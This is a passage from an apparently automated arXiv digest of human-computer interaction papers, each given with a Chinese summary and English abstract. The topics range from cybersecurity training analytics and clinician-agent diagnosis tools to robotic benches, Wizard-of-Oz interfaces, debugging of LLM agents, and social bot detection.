receive support during planning and translation stages of CPT, though these effects reduce in a delayed post-test. Analyses of learner behavior and perceptions further illustrate how CPT-aligned conversational support shapes reflection processes and learner experience, contributing empirical evidence for theory-driven uses of LLMs in AI-supported reflective writing.
[HC-3] Multimodal Analytics of Cybersecurity Crisis Preparation Exercises: What Predicts Success?
【速读】:该论文旨在解决教学一致性(instructional alignment)在大规模情境下难以操作化的问题,即如何量化“预期认知”与“实际教学活动”之间的匹配程度,并将其用于预测学生在网络安全模拟训练中的表现。其解决方案的关键在于:首先,通过Bloom分类法对任务目标和团队邮件进行编码,定义“教学一致性”为所需认知层次与实际执行层次之间的差异;其次,利用多模态数据(文本嵌入和日志特征)构建预测模型,发现这些特征比仅基于Bloom层级的模型具有显著更高的预测能力(AUC达0.80),且教学一致性本身提供了可解释的诊断性洞察,从而实现了对模拟训练效果的有效评估与优化。
链接: https://arxiv.org/abs/2603.28553
作者: Conrad Borchers,Valdemar Švábenský,Sandesh K. Kafle,Kevin K. Tang,Jan Vykopal
机构: University of South Bohemia in České Budějovice (南波希米亚大学); Masaryk University (马萨里克大学)
类目: Human-Computer Interaction (cs.HC); Computers and Society (cs.CY); Machine Learning (cs.LG)
备注: Accepted as full paper to the 27th International Conference on Artificial Intelligence in Education (AIED 2026)
Abstract:Instructional alignment, the match between intended cognition and enacted activity, is central to effective instruction but hard to operationalize at scale. We examine alignment in cybersecurity simulations using multimodal traces from 23 teams (76 students) across five exercise sessions. Study 1 codes objectives and team emails with Bloom’s taxonomy and models the completion of key exercise tasks with generalized linear mixed models. Alignment, defined as the discrepancy between required and enacted Bloom levels, predicts success, whereas the Bloom category alone does not predict success once discrepancy is considered. Study 2 compares predictive feature families using grouped cross-validation and l1-regularized logistic regression. Text embeddings and log features outperform Bloom-only models (AUC~0.74 and 0.71 vs. 0.55), and their combination performs best (Test AUC~0.80), with Bloom frequencies adding little. Overall, the work offers a measure of alignment for simulations and shows that multimodal traces best forecast performance, while alignment provides interpretable diagnostic insight.
[HC-4] Within the MDT Room: Situated in Multidisciplinary Team-Grounded Agent Debate for Clinical Diagnosis
【速读】:该论文旨在解决罕见病诊断中因症状异质性、临床认知有限及跨学科证据碎片化导致的挑战,以及现有基于大语言模型(Large Language Model, LLM)的多智能体系统在人机协同中的局限性问题。当前系统虽能模拟多学科团队讨论生成诊断假设,但缺乏对医生有效干预的支持,常以线性、无结构的对话日志呈现结果,使临床医生难以快速理解推理过程、及时介入或引导智能体决策。解决方案的关键在于提出MDTRoom——一个交互式可视化工作空间,将多智能体讨论转化为结构化的可检查对象,显式呈现患者数据、证据溯源、假设演化和智能体间冲突等要素,并通过相互关联的视觉元素支持医生高效审查、适时干预与引导推理过程,从而显著提升医-智协同效率与诊断质量。
链接: https://arxiv.org/abs/2603.28393
作者: Peng Kuai,Yukun Yang,Shaolun Ruan,Junchi Xu,Yanjie Zhang,Lin Zhang,Min Zhu,Rui Sheng
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Rare disease diagnosis is inherently challenging due to heterogeneous symptoms, limited clinical familiarity, and fragmented evidence across specialties. Recent large language model (LLM)-based agentic systems have shown promise by simulating multidisciplinary team discussions to generate and evaluate diagnostic hypotheses. However, fully automated diagnosis remains unrealistic, and existing human-in-the-loop approaches provide limited support for effective clinician-agent collaboration. In practice, clinicians are often presented with final diagnostic outputs and lengthy, unstructured agent discussion logs, making it difficult to inspect reasoning, intervene in a timely manner, or guide agent deliberation effectively. To address these challenges, we developed MDTRoom, an interactive system that transforms multi-agent discussions from linear transcripts into a structured, inspectable workspace. The system externalizes patient data, evidence provenance, hypothesis evolution, and inter-agent conflicts as interconnected visual objects, enabling clinicians to efficiently examine, intervene in, and guide agent reasoning. Our evaluation demonstrates the effectiveness of MDTRoom in supporting clinician-agent collaboration.
[HC-5] ailoring AI-Driven Reading Scaffolds to the Distinct Needs of Neurodiverse Learners
【速读】:该论文旨在解决神经多样性学习者在阅读过程中对支持性辅助工具(scaffolding)的需求与潜在认知过载之间的矛盾问题,即如何在不增加注意力和工作记忆负担的前提下提升阅读理解能力。其解决方案的关键在于采用“条件性支架”(contingent scaffolding)视角,通过对比结构性(如句子分段)与语义性(如图标、关键词标签)两类支架的组合效果,发现不存在普适最优的单一支架形式,而是需根据个体差异动态调整支架类型与强度,从而实现个性化支持,并为未来人机协同调控(human-AI co-regulation)在包容性阅读环境中的设计提供依据。
链接: https://arxiv.org/abs/2603.28370
作者: Soufiane Jhilal,Eleonora Pasqua,Caterina Marchesi,Riccardo Corradi,Martina Galletti
机构: 未知
类目: Computation and Language (cs.CL); Human-Computer Interaction (cs.HC)
备注: Accepted at AIED 2026
Abstract:Neurodiverse learners often require reading supports, yet increasing scaffold richness can sometimes overload attention and working memory rather than improve comprehension. Grounded in the Construction-Integration model and a contingent scaffolding perspective, we examine how structural versus semantic scaffolds shape comprehension and reading experience in a supervised inclusive context. Using an adapted reading interface, we compared four modalities: unmodified text, sentence-segmented text, segmented text with pictograms, and segmented text with pictograms plus keyword labels. In a within-subject pilot with 14 primary-school learners with special educational needs and disabilities, we measured reading comprehension using standardized questions and collected brief child- and therapist-reported experience measures alongside open-ended feedback. Results highlight heterogeneous responses as some learners showed patterns consistent with benefits from segmentation and pictograms, while others showed patterns consistent with increased coordination costs when visual scaffolds were introduced. Experience ratings showed limited differences between modalities, with some apparent effects linked to clinical complexity, particularly for perceived ease of understanding. Open-ended feedback of the learners frequently requested simpler wording and additional visual supports. These findings suggest that no single scaffold is universally optimal, reinforcing the need for calibrated, adjustable scaffolding and provide design implications for human-AI co-regulation in supervised inclusive reading contexts.
[HC-6] Proposing a Game Theory Approach to Explore Group Dynamics with Social Robot ICIP
【速读】:该论文试图解决的问题是:如何通过引入社交机器人(social robots)来促进群体成员之间的合作,尤其是在群体决策过程中机器人角色的社会影响尚未明确的背景下。解决方案的关键在于采用博弈论方法,利用公共品博弈(Public Good Game)构建一个简化且可控的社会情境,以系统评估机器人对人类合作行为的影响机制,从而为教育环境和工作场所中机器人辅助协作提供理论依据与实践路径。
链接: https://arxiv.org/abs/2603.28348
作者: Giulia Pusceddu
机构: 未知
类目: Robotics (cs.RO); Human-Computer Interaction (cs.HC)
备注: Honorable Mention at HRI Pioneers 2025. Peer-reviewed. this https URL
Abstract:Integrating social robots in our group-based society, beyond the technical challenges, requires considering the social group dynamics. Following the results from preliminary exploratory studies on the influence of social robots on group decisions, the proposed research investigates whether social robots can foster cooperation among group members. To achieve this, I propose a game theory approach, employing the Public Good Game to recreate a simplified and controlled social situation where the robot’s influence can be evaluated. Clarifying the role of robots in promoting collaboration among humans might have a significant impact in educational environments, enhancing student learning, as well as in workplace settings, where they could facilitate problem-solving and lead to shared solutions.
[HC-7] Animated Public Furniture as an Interaction Mediator: Engaging Passersby In-the-Wild with Robotic Benches
【速读】:该论文旨在解决如何通过动态交互式公共家具(如移动机器人长椅)来主动调节城市环境中行人的社会互动行为,从而提升人与建成环境之间的体验质量。其核心解决方案在于提出一个“可供性过渡模型”(Affordance Transition Model, ATM),该模型揭示了机器人家具在实际场景中可通过三种感知到的可供性——作为机器人激活参与、作为空间元素重新分配参与、以及作为基础设施稳定参与——实现对行人互动状态的主动引导与过渡,从而系统性地增强公共空间的社会活跃度与用户沉浸感。
链接: https://arxiv.org/abs/2603.28339
作者: Xinyan Yu,Marius Hoggenmueller,Xin Lu,Ozan Balci,Martin Tomitsch,Andrew Vande Moere,Alex Binh Vinh Duc Nguyen
机构: The University of Sydney(悉尼大学); KU Leuven(鲁汶大学); University of Technology Sydney(悉尼科技大学); University of Antwerp(安特卫普大学)
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Urban HCI investigates how digital technologies shape human behaviour within the social, spatial, temporal dynamics of public space. Meanwhile, robotic furniture research demonstrates how the purposeful animation of mundane utilitarian elements can influence human behaviour in everyday contexts. Taken together, these strands highlight an untapped opportunity to investigate how animated public furniture could mediate social interaction in urban environments. In this paper, we present the design process and in-the-wild study of mobile robotic benches that reconfigure with a semi-outdoor public space. Our findings show that the gestural performance of the benches manifested three affordances perceived by passersby, they activated engagement as robots, redistributed engagement as spatial elements, and settled engagement as infrastructure. We proposed an Affordance Transition Model (ATM) describing how robotic furniture could proactively facilitate transition between these affordances to engage passersby. Our study bridges robotic furniture and urban HCI to activate human experience with the built environment purposefully.
[HC-8] Users and Wizards in Conversations: How WoZ Interface Choices Define Human-Robot Interactions
【速读】:该论文旨在解决Wizard-of-Oz(WoZ)实验中接口设计对人机交互质量影响的问题,特别是从用户和操作者(wizard)双重视角评估不同界面如何塑造机器人感知与社交表现。其解决方案的关键在于对比三种具有不同对话输入输出限制的WoZ界面:受限感知图形用户界面(GUI)、无限制感知GUI以及虚拟现实(VR)远程存在界面。研究发现,VR界面通过提供沉浸式音视频流和操作者自发的非语言行为传递(如语音、注视和面部表情),显著提升了用户的机器人特征感知和社交临场感(social presence),并促进更连贯的交互节奏(减少沉默与错位),尽管对操作者要求更高。这表明,采用远程存在类接口可更真实地模拟未来机器人交互场景,为基于自然情境下言语与非言语行为数据的自动化系统开发提供有效路径。
链接: https://arxiv.org/abs/2603.28338
作者: Ekaterina Torubarova,Jura Miniota,Andre Pereira
机构: 未知
类目: Human-Computer Interaction (cs.HC); Robotics (cs.RO)
备注: Published in Robotics: Science and Systems (2025)
Abstract:In this paper, we investigated how the choice of a Wizard-of-Oz (WoZ) interface affects communication with a robot from both the user’s and the wizard’s perspective. In a conversational setting, we used three WoZ interfaces with varying levels of dialogue input and output restrictions: a) a restricted perception GUI that showed fixed-view video and ASR transcripts and let the wizard trigger pre-scripted utterances and gestures; b) an unrestricted perception GUI that added real-time audio from the participant and the robot c) a VR telepresence interface that streamed immersive stereo video and audio to the wizard and forwarded the wizard’s spontaneous speech, gaze and facial expressions to the robot. We found that the interaction mediated by the VR interface was preferred by users in terms of robot features and perceived social presence. For the wizards, the VR condition turned out to be the most demanding but elicited a higher social connection with the users. VR interface also induced the most connected interaction in terms of inter-speaker gaps and overlaps, while Restricted GUI induced the least connected flow and the largest silences. Given these results, we argue for more WoZ studies using telepresence interfaces. These studies better reflect the robots of tomorrow and offer a promising path to automation based on naturalistic contextualized verbal and non-verbal behavioral data.
[HC-9] Fostering Design-Policy Collaboration through Contestation: An Adversarial Futuring Method
【速读】:该论文旨在解决新兴技术发展过程中技术设计与政策制定之间存在的社会技术张力(sociotechnical tensions),即二者在应对复杂社会影响时缺乏有效协同的问题。解决方案的关键在于提出“设计-政策对抗性未来推演”(Design-Policy Adversarial Futuring)这一基于情景的研讨会方法,通过结构化地呈现设计视角与政策视角之间的争议(contestation),促进跨领域协作;其核心机制包括揭示不断变化的损害形态、将抽象政策概念具象化为具体应用场景,并在保持政策推理现实性的前提下合理化极端设想,从而推动人机交互(HCI)与政策领域的实质性对话与合作。
链接: https://arxiv.org/abs/2603.28331
作者: Xinyan Yu,Marius Hoggenmueller,Tram Thi Minh Tran,Martin Tomitsch
机构: The University of Sydney (悉尼大学); University of Technology Sydney (悉尼科技大学)
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Emerging technologies introduce sociotechnical tensions that call for closer collaboration between technology design and policy. In this work, we introduce Design-Policy Adversarial Futuring, a scenario-based workshop method that supports design-policy engagement by structuring contestation between design and policy perspectives. We report on a workshop conducted in the autonomous mobility domain with 12 HCI researchers, used to explore and demonstrate the method in practice. The workshop illustrates how the adversarial futuring method can surface shifting harms, translate policy abstractions into situated use, and legitimise extreme ideas while maintaining grounded policy reasoning. This work contributes a reusable, exploratory method for supporting HCI-policy collaboration through contestation, which can be adapted across emerging technological domains.
[HC-10] Designing AI for Real Users – Accessibility Gaps in Retail AI Front-End
【速读】:该论文旨在解决当前生成式 AI (Generative AI) 系统在用户界面设计中对不同能力用户群体(如视觉、听觉、运动、认知、言语及感官差异者,以及数字素养和交互规范存在年龄差异的用户)存在的隐性排斥问题。尽管许多AI前端系统被宣传为直观且包容,但其交互假设往往默认“理想用户的身体与心智状态”,从而在实际使用中造成边缘化。论文指出,此类问题并非源于技术限制,而是由商业、组织和采购环境中的结构性缺陷所致——其中无障碍设计极少作为合同义务。解决方案的关键在于引入“前端保障”(front-end assurance),即通过制度性机制确保AI系统的智能性和多模态特性能够真正适配多样化的现实用户需求,从而实现从技术伦理到实践落地的闭环治理。
链接: https://arxiv.org/abs/2603.28196
作者: Neha Puri,Tim Dixon
机构: 未知
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI)
备注: Accepted at the Proceedings of the CHI 2026 Workshop: Ethics at the Front-End
Abstract:As AI becomes embedded in customer-facing systems, ethical scrutiny has largely focused on models, data, and governance. Far less attention has been paid to how AI is experienced through user-facing design. This commentary argues that many AI front-ends implicitly assume an ‘ideal user body and mind’, and that this becomes visible and ethically consequential when examined through the experiences of differently abled users. We explore this through retail AI front-ends for customer engagement - i.e., virtual assistants, virtual try-on systems, and hyper-personalised recommendations. Despite intuitive and inclusive framing, these systems embed interaction assumptions that marginalise users with vision, hearing, motor, cognitive, speech and sensory differences, as well as age-related variation in digital literacy and interaction norms. Drawing on practice-led insights, we argue that these failures persist not primarily due to technical limits, but due to the commercial, organisational, and procurement contexts in which AI front-ends are designed and deployed, where accessibility is rarely contractual. We propose front-end assurance as a practical complement to AI governance, aligning claims of intelligence and multimodality with the diversity of real users.
[HC-11] InconLens: Interactive Visual Diagnosis of Behavioral Inconsistencies in LLM -based Agent ic Systems
【速读】:该论文旨在解决大语言模型(Large Language Model, LLM)驱动的智能体系统在多轮执行中因生成过程的随机性导致的行为不一致性问题,即相同输入下智能体可能在不同运行中表现各异,而现有调试与评估工具难以支持跨运行的行为对比分析。其解决方案的关键在于提出InconLens这一可视化分析系统,通过引入信息节点(information nodes)作为中间抽象,捕获多个执行路径中共有的语义里程碑,从而实现对智能体推理轨迹的语义对齐与跨运行比较,帮助开发者高效识别行为分歧点、发现潜在失败模式,并获得提升系统可靠性和稳定性的可操作洞察。
链接: https://arxiv.org/abs/2603.28106
作者: Shuo Yan,Xiaolin Wen,Shaolun Ruan,Yanjie Zhang,Jiaming Mi,Yushi Sun,Huamin Qu,Rui Sheng
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Large Language Model (LLM)-based agentic systems have shown growing promise in tackling complex, multi-step tasks through autonomous planning, reasoning, and interaction with external environments. However, the stochastic nature of LLM generation introduces intrinsic behavioral inconsistency: the same agent may succeed in one execution but fail in another under identical inputs. Diagnosing such inconsistencies remains a major challenge for developers, as agent execution logs are often lengthy, unstructured, and difficult to compare across runs. Existing debugging and evaluation tools primarily focus on inspecting single executions, offering limited support for understanding how and why agent behaviors diverge across repeated runs. To address this challenge, we introduce InconLens, a visual analytics system designed to support interactive diagnosis of LLM-based agentic systems with a particular focus on cross-run behavioral analysis. InconLens introduces information nodes as an intermediate abstraction that captures canonical informational milestones shared across executions, enabling semantic alignment and inspection of agent reasoning trajectories across multiple runs. We demonstrate the effectiveness of InconLens through a detailed case study and further validate its usability and analytical value via expert interviews. Our results show that InconLens enables developers to more efficiently identify divergence points, uncover latent failure modes, and gain actionable insights into improving the reliability and stability of agentic systems.
[HC-12] Synonymix: Unified Group Personas for Generative Simulations
【速读】:该论文旨在解决生成式AI(Generative AI)在模拟人类行为时存在的尺度局限问题,即当前方法仅聚焦于个体层面的个性化角色建模或宏观群体统计分析,缺乏对群体层次(meso-level)结构化表示的探索。其核心挑战在于如何在保留个体丰富经验的基础上,构建可查询、可交互的群体级抽象模型,从而支持更精细的行为分析与干预测试。解决方案的关键在于提出Synonymix框架,通过图结构抽象与合并技术,将多个个体生命故事(life story personas)整合为一个“unigraph”(统一图结构),形成兼具语义连贯性与隐私保护能力的群体表征;实验表明,该方法在通用社会调查(General Social Survey)任务中显著优于仅基于人口统计学的基线模型(p<0.001, r=0.59),且最大源贡献不超过13%,具备明确的隐私保障能力。
链接: https://arxiv.org/abs/2603.28066
作者: Huanxing Chen,Aditesh Kumar
机构: Stanford University (斯坦福大学)
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI)
备注: 6 pages (excluding appendix), 3 figures, CHI’26 Extended Abstract (Poster)
Abstract:Generative agent simulations operate at two scales: individual personas for character interaction, and population models for collective behavior analysis and intervention testing. We propose a third scale: meso-level simulation - interaction with group-level representations that retain grounding in rich individual experience. To enable this, we present Synonymix, a pipeline that constructs a “unigraph” from multiple life story personas via graph-based abstraction and merging, producing a queryable collective representation that can be explored for sensemaking or sampled for synthetic persona generation. Evaluating synthetic agents on General Social Survey items, we demonstrate behavioral signal preservation beyond demographic baselines (p0.001, r=0.59) with demonstrable privacy guarantee (max source contribution 13%). We invite discussion on interaction modalities enabled by meso-level simulations, and whether “high-fidelity” personas can ever capture the texture of lived experience.
[HC-13] CARLA-Air: Fly Drones Inside a CARLA World – A Unified Infrastructure for Air-Ground Embodied Intelligence
【速读】:该论文旨在解决当前仿真基础设施在低空经济(low-altitude economies)、具身智能(embodied intelligence)与空地协同系统(air-ground cooperative systems)研究中面临的多模态、跨域一致性建模难题。现有开源平台存在领域割裂问题:驾驶仿真缺乏空中动力学,而多旋翼飞行仿真缺少真实地面场景;基于桥接的联合仿真虽可整合但引入同步开销且无法保证严格时空一致性。其解决方案的关键在于提出CARLA-Air——一个基于Unreal Engine单进程统一实现高保真城市驾驶与物理精确多旋翼飞行的开放框架,通过共享物理tick和渲染管线,在同一环境中同步支持最多18种传感器模态,同时保留CARLA与AirSim原生Python API及ROS 2接口,实现零修改代码复用,并支持自定义机器人平台扩展,从而为跨空地协同的具身智能任务提供统一、一致、可扩展的仿真基础。
链接: https://arxiv.org/abs/2603.28032
作者: Tianle Zeng,Hanxuan Chen,Yanci Wen,Hong Zhang
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Human-Computer Interaction (cs.HC)
备注: Prebuilt binaries, project page, full source code, and community discussion group are all available at: this https URL
Abstract:The convergence of low-altitude economies, embodied intelligence, and air-ground cooperative systems creates growing demand for simulation infrastructure capable of jointly modeling aerial and ground agents within a single physically coherent environment. Existing open-source platforms remain domain-segregated: driving simulators lack aerial dynamics, while multirotor simulators lack realistic ground scenes. Bridge-based co-simulation introduces synchronization overhead and cannot guarantee strict spatial-temporal consistency. We present CARLA-Air, an open-source infrastructure that unifies high-fidelity urban driving and physics-accurate multirotor flight within a single Unreal Engine process. The platform preserves both CARLA and AirSim native Python APIs and ROS 2 interfaces, enabling zero-modification code reuse. Within a shared physics tick and rendering pipeline, CARLA-Air delivers photorealistic environments with rule-compliant traffic, socially-aware pedestrians, and aerodynamically consistent UAV dynamics, synchronously capturing up to 18 sensor modalities across all platforms at each tick. The platform supports representative air-ground embodied intelligence workloads spanning cooperation, embodied navigation and vision-language action, multi-modal perception and dataset construction, and reinforcement-learning-based policy training. An extensible asset pipeline allows integration of custom robot platforms into the shared world. By inheriting AirSim’s aerial capabilities – whose upstream development has been archived – CARLA-Air ensures this widely adopted flight stack continues to evolve within a modern infrastructure. Released with prebuilt binaries and full source: this https URL Comments: Prebuilt binaries, project page, full source code, and community discussion group are all available at: this https URL Subjects: Robotics (cs.RO); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Human-Computer Interaction (cs.HC) Cite as: arXiv:2603.28032 [cs.RO] (or arXiv:2603.28032v1 [cs.RO] for this version) https://doi.org/10.48550/arXiv.2603.28032 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[HC-14] Filipino Students Willingness to Use AI for Mental Health Support: A Path Analysis of Behavioral Emotional and Contextual Factors
【速读】:该论文旨在解决菲律宾学生在心理健康支持中对人工智能(Artificial Intelligence, AI)工具使用意愿的影响因素问题。研究发现,行为习惯是影响使用意愿的最强因素,其次是情感舒适度、情绪收益、促进条件和感知有用性;关键解决方案在于通过AI素养教育、共情设计和伦理政策,构建情感安全环境并培养日常使用习惯,从而推动负责任且符合文化敏感性的AI在学生心理健康服务中的应用。
链接: https://arxiv.org/abs/2603.27994
作者: John Paul P. Miranda,Rhiziel P. Manalese,Ivan G. Liwanag,Rodel T. Alimurong,Alvin B. Roque
机构: 未知
类目: Human-Computer Interaction (cs.HC); Computers and Society (cs.CY)
备注: 24 pages, 5 figures, 1 table, book chapter
Abstract:This study examined how behavioral, emotional, and contextual factors influence Filipino students’ willingness to use artificial intelligence (AI) for mental health support. Results showed that habit had the strongest effect on willingness, followed by comfort, emotional benefit, facilitating conditions, and perceived usefulness. Students who used AI tools regularly felt more confident and open to relying on them for emotional support. Empathy, privacy, and accessibility also increased comfort and trust in AI systems. The findings highlight that emotional safety and routine use are essential in promoting willingness. The study recommends AI literacy programs, empathic design, and ethical policies that support responsible and culturally sensitive use of AI for student mental health care.
[HC-15] ViviDoc: Generating Interactive Documents through Human-Agent Collaboration
【速读】:该论文旨在解决交互式文档(Interactive Document)生成成本高、难以控制的问题,即传统方法需同时具备领域知识和网页开发技能,而直接使用大语言模型(Large Language Model, LLM)生成时又缺乏可控性。解决方案的关键在于提出ViviDoc,一个基于多智能体流水线(Planner、Styler、Executor、Evaluator)的系统,并引入三个层级的人类控制机制:(1)文档规范(Document Specification, DocSpec)结合SRTC交互规范(State, Render, Transition, Constraint)实现结构化规划;(2)内容感知的风格调色板(Style Palette)支持写作风格与交互行为的定制;(3)基于聊天的迭代编辑功能用于精细调整。该方案显著提升了生成内容的丰富度与交互质量,在自动化评估和用户研究中均表现出优越性能。
链接: https://arxiv.org/abs/2603.27991
作者: Yinghao Tang,Yupeng Xie,Yingchaojie Feng,Tingfeng Lan,Jiale Lao,Yue Cheng,Wei Chen
机构: State Key Lab of CADCG, Zhejiang University (浙江大学CADCG国家重点实验室); HKUST(GZ) (香港科技大学(广州)); National University of Singapore (新加坡国立大学); University of Virginia (弗吉尼亚大学); Cornell University (康奈尔大学)
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI)
备注:
Abstract:Interactive documents help readers engage with complex ideas through dynamic visualization, interactive animations, and exploratory interfaces. However, creating such documents remains costly, as it requires both domain expertise and web development skills. Recent Large Language Model (LLM)-based agents can automate content creation, but directly applying them to interactive document generation often produces outputs that are difficult to control. To address this, we present ViviDoc, to the best of our knowledge the first work to systematically address interactive document generation. ViviDoc introduces a multi-agent pipeline (Planner, Styler, Executor, Evaluator). To make the generation process controllable, we provide three levels of human control: (1) the Document Specification (DocSpec) with SRTC Interaction Specifications (State, Render, Transition, Constraint) for structured planning, (2) a content-aware Style Palette for customizing writing and interaction styles, and (3) chat-based editing for iterative refinement. We also construct ViviBench, a benchmark of 101 topics derived from real-world interactive documents across 11 domains, along with a taxonomy of 8 interaction types and a 4-dimensional automated evaluation framework validated against human ratings (Pearson r 0.84). Experiments show that ViviDoc achieves the highest content richness and interaction quality in both automated and human evaluation. A 12-person user study confirms that the system is easy to use, provides effective control over the generation process, and produces documents that satisfy users.
[HC-16] From Passersby to Placemaking: Designing Autonomous Vehicle-Pedestrian Encounters for an Urban Shared Space
【速读】:该论文旨在解决自动驾驶汽车(AV)在城市共享空间中对行人体验和场所营造(placemaking)的潜在负面影响问题,即AV可能削弱以人为核心的空间氛围。解决方案的关键在于设计基于场所的外部人机交互界面(eHMI),通过增强传统意图表达eHMI的功能,并实现内容与物理形态上与城市共享空间的高度融合,从而提升行人感知的安全性、愉悦感及共存意图,进而支持以人为本的场所营造目标。
链接: https://arxiv.org/abs/2603.27933
作者: Yiyuan Wang,Martin Tomitsch,Marius Hoggenmüller,Senuri Wijenayake,Wai Yan,Luke Hespanhol
机构: The University of Sydney(悉尼大学); The University of Technology Sydney(悉尼科技大学); The Royal Melbourne Institute of Technology(皇家墨尔本理工大学)
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Autonomous vehicles (AVs) tend to disrupt the atmosphere and pedestrian experience in urban shared spaces, undermining the focus of these spaces on people and placemaking. We investigate how external human-machine interfaces (eHMIs) supporting AV-pedestrian interaction can be extended to consider the characteristics of an urban shared space. Inspired by urban HCI, we devised three place-based eHMI designs that (i) enhance a conventional intent eHMI and (ii) exhibit content and physical integration with the space. In an evaluation study, 25 participants experienced the eHMIs in an immersive simulation of the space via virtual reality and shared their impressions through think-aloud, interviews, and questionnaires. Results showed that the place-based eHMIs had a notable effect on influencing the perception of AV interaction, including aspects like visual aesthetics and sense of reassurance, and on fostering a sense of place, such as social interactivity and the intentionality to coexist. In measuring qualities of pedestrian experience, we found that perceived safety significantly correlated with user experience and affect, including the attractiveness of eHMIs and feelings of pleasantness. The paper opens the avenue for exploring how eHMIs may contribute to the placemaking goals of pedestrian-centric spaces and improve the experience of people encountering AVs within these environments.
[HC-17] MGDIL: Multi-Granularity Summarization and Domain-Invariant Learning for Cross-Domain Social Bot Detection
【速读】:该论文旨在解决社交机器人(Social Bots)在在线平台中通过复杂伪装渗透所带来的信息生态威胁问题,特别是现有检测方法在模态缺失、输入不完整或训练测试分布不一致(out-of-distribution, OOD)场景下表现脆弱的问题。其解决方案的关键在于提出一个统一框架 Multi Granularity Summarization and Domain Invariant Learning (MGDIL),该框架首先利用大语言模型(LLM)进行多粒度摘要,将异构信号转化为统一的文本表示;随后构建协同优化机制,融合任务导向的LLM指令微调与域不变表征学习:前者增强模型对隐含语义线索和伪装模式的捕捉能力,后者通过域对抗学习与跨域对比学习联合实现跨数据集和时间维度的分布对齐,从而学习稳定且判别性强的域不变特征,显著提升跨域社交机器人检测的鲁棒性。
链接: https://arxiv.org/abs/2603.27928
作者: Boyu Qiao,Yunman Chen,Kun Li,Wei Zhou,Songlin Hu,Yunya Song
机构: Institute of Information Engineering, Chinese Academy of Sciences (中国科学院信息工程研究所); School of Cyber Security, University of Chinese Academy of Sciences (中国科学院大学网络空间安全学院); Hong Kong University of Science and Technology (香港科技大学)
类目: ocial and Information Networks (cs.SI); Human-Computer Interaction (cs.HC)
备注:
Abstract:Social bots increasingly infiltrate online platforms through sophisticated disguises, threatening healthy information ecosystems. Existing detection methods often rely on modality specific cues or local contextual features, making them brittle when modalities are missing or inputs are incomplete. Moreover, most approaches assume similar train test distributions, which limits their robustness to out of distribution (OOD) samples and emerging bot types. To address these challenges, we propose Multi Granularity Summarization and Domain Invariant Learning (MGDIL), a unified framework for robust social bot detection under domain shift. MGDIL first transforms heterogeneous signals into unified textual representations through LLM based multi granularity summarization. Building on these representations, we design a collaborative optimization framework that integrates task oriented LLM instruction tuning with domain invariant representation learning. Specifically, task oriented instruction tuning enhances the LLMs ability to capture subtle semantic cues and implicit camouflage patterns, while domain adversarial learning and cross domain contrastive learning are jointly employed to mitigate distribution shifts across datasets and time periods. Through this joint optimization, MGDIL learns stable and discriminative domain invariant features, improving cross domain social bot detection through better distribution alignment, stronger intra class compactness, and clearer inter class separation.
[HC-18] Comparing Design Metaphors and User-Driven Metaphors for Interaction Design
【速读】:该论文试图解决的问题是:设计者所设想的用户体验隐喻(design metaphors)是否与用户实际感知的体验隐喻(user metaphors)一致,以及这种一致性如何影响用户体验的评估与优化。解决方案的关键在于构建一个系统性的比较框架,通过收集554个用户隐喻及其匹配度评分,并结合平台自上线以来的历史网络数据识别出21个设计隐喻,从而揭示设计与用户隐喻之间的不匹配现象,并指出即使两者一致时也未必具有普遍共鸣,进而为优化用户界面和交互设计提供实证依据。
链接: https://arxiv.org/abs/2603.27908
作者: Beleicia Bullock,James A. Landay,Michael S. Bernstein
机构: Stanford University (斯坦福大学)
类目: Human-Computer Interaction (cs.HC)
备注: Accepted at CHI 2026
Abstract:Metaphors enable designers to communicate their ideal user experience for platforms. Yet, we often do not know if these design metaphors match users’ actual experiences. In this work, we compare design and user metaphors across three different platforms: ChatGPT, Twitter, and YouTube. We build on prior methods to elicit 554 user metaphors, as well as ratings on how well each metaphor describes users’ experiences. We then identify 21 design metaphors by analyzing each platform’s historical web presence since their launch date. We find that design metaphors often do not match the metaphors that users use to describe their experiences. Even when design and user metaphors do match, the metaphors do not always resonate universally. Through these findings, we highlight how comparing design and user metaphors can help to evaluate and refine metaphors for user experience.
[HC-19] Visualization use in qualitative research reports: Evolving media types and competing epistemologies
【速读】:该论文试图解决的问题是:当前质性研究中用于呈现研究发现的可视化媒介(visual media)使用情况及其背后的原因尚不明确。为回应这一问题,作者采用数据驱动的文献综述方法,通过内容分析法对2020至2022年间三本质性研究方法期刊中发表的论文和图表进行系统分析,将图表按类型(如矩阵图、维恩图、流程图等)分类,并依据文献的本体论立场(即客观主义、主观主义或建构主义)对文档分组,进而运用对应分析(correspondence analysis)与认识论网络分析(epistemic network analysis)揭示其结构特征。解决方案的关键在于:通过量化分析手段识别出视觉媒介在质性研究中的使用现状——尽管整体仍较为匮乏,但图表类型趋于多样化,且其使用模式可能与研究者的本体论立场无关,从而为未来将数据可视化工具更有效地整合进质性研究报告提供实证基础与理论依据。
链接: https://arxiv.org/abs/2603.27849
作者: Jayrylle R. Jaylo,Mia Chastain,Alli Nemec,Christina S. Ouch,Yared Asefa,Marcus Li,Andrew Ung,Caleb M. Trujillo
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注: 10 pages, 3 figures, ACM CHI '26 Conference Data Literacy Workshop, April 13-17, Barcelona, ES
